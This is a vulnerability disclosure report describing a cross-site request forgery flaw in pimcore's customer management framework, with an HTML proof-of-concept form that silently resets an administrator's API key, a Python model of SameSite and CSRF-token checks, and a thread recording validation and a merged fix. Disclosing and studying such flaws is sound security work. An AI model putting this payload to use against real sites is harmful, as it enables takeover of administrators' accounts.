Cross-Site Request Forgery (CSRF) in pimcore/pimcore

Valid

Reported on

Jul 25th 2021


✍️ Description

The application has no CSRF protection, and the session cookie's SameSite attribute is set to Lax. Lax still sends the cookie on top-level GET navigations, so any endpoint that alters data in response to a GET request is vulnerable to CSRF.

Open the HTML payload below and submit the form; afterwards the admin user's API key has been changed to the following value: 63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://x.pimcore.fun/admin/customermanagementframework/settings/webservice-users">
      <input type="hidden" name="xaction" value="update" />
      <input type="hidden" name="&#95;dc" value="" />
      <input type="hidden" name="data" value="&#123;&quot;id&quot;&#58;1&#44;&quot;name&quot;&#58;&quot;admin&quot;&#44;&quot;firstname&quot;&#58;null&#44;&quot;lastname&quot;&#58;null&#44;&quot;email&quot;&#58;null&#44;&quot;apiKey&quot;&#58;&quot;63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12&quot;&#44;&quot;image&quot;&#58;&quot;&#47;admin&#47;user&#47;get&#45;image&#63;id&#61;1&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I tested this payload on both the stable and dev editions (on demo sites).
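To make the two halves of the finding concrete, here is an added example (not pimcore's code, and not the fix merged in the PR below) that models why SameSite=Lax does not stop the PoC form and what a state-changing endpoint such as the webservice-users settings handler needs to check server-side; the `_csrf` parameter name and the attacker origin used in comments are assumptions.

```python
# Added example, not pimcore's code: models (1) why SameSite=Lax does not block
# the PoC above and (2) the server-side checks a state-changing endpoint needs.
from dataclasses import dataclass, field
from typing import Optional, Tuple
from urllib.parse import urlsplit

ADMIN_ORIGIN = "https://x.pimcore.fun"  # origin used in the PoC


def cookie_sent(samesite: str, top_level_nav: bool, method: str, cross_site: bool) -> bool:
    """Simplified browser rule: is the session cookie attached to this request?"""
    if not cross_site or samesite == "None":
        return True
    if samesite == "Lax":
        # Lax still sends the cookie on top-level GET navigations, which is
        # exactly what a cross-site <form> submission with the default method is.
        return top_level_nav and method == "GET"
    return False  # Strict: never on cross-site requests


@dataclass
class Request:
    method: str
    params: dict
    headers: dict = field(default_factory=dict)
    session_csrf_token: Optional[str] = None  # token bound to the user's session


def authorize_state_change(req: Request) -> Tuple[bool, str]:
    """Checks for an endpoint where xaction=update mutates data (e.g. an API key)."""
    if req.params.get("xaction") != "update":
        return True, "read-only action"
    if req.method != "POST":
        # Refusing GET removes the top-level-navigation path that Lax leaves open.
        return False, "state change must use POST"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    o = urlsplit(origin)
    if f"{o.scheme}://{o.netloc}" != ADMIN_ORIGIN:
        # history.pushState in the PoC rewrites the Referer path, not its origin.
        return False, "cross-origin request"
    token = req.params.get("_csrf")  # hypothetical token field name
    if not token or token != req.session_csrf_token:
        return False, "missing or invalid CSRF token"
    return True, "ok"
```

The Origin/Referer comparison is a secondary check: some browsers or privacy settings strip Referer, so the per-session token remains the primary defence and the POST-only rule removes the GET path entirely.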

💥 Impact

This vulnerability can be used to take control of any user's account.

Occurrences

Ziding Zhang
4 months ago

Admin


Hey amammad, just contacted pimcore re: this report. Waiting to hear back, good job!

amammad
4 months ago

Researcher


Hi dear pimcore team, if you want more help just tell me.

Bernhard Rusch
4 months ago

@amammad thanks!

Bernhard Rusch validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on 8aa0ca 4 months ago
Bernhard Rusch has been awarded the fix bounty
Bernhard Rusch
4 months ago

https://github.com/pimcore/customer-data-framework/pull/227 fixes the problem as well.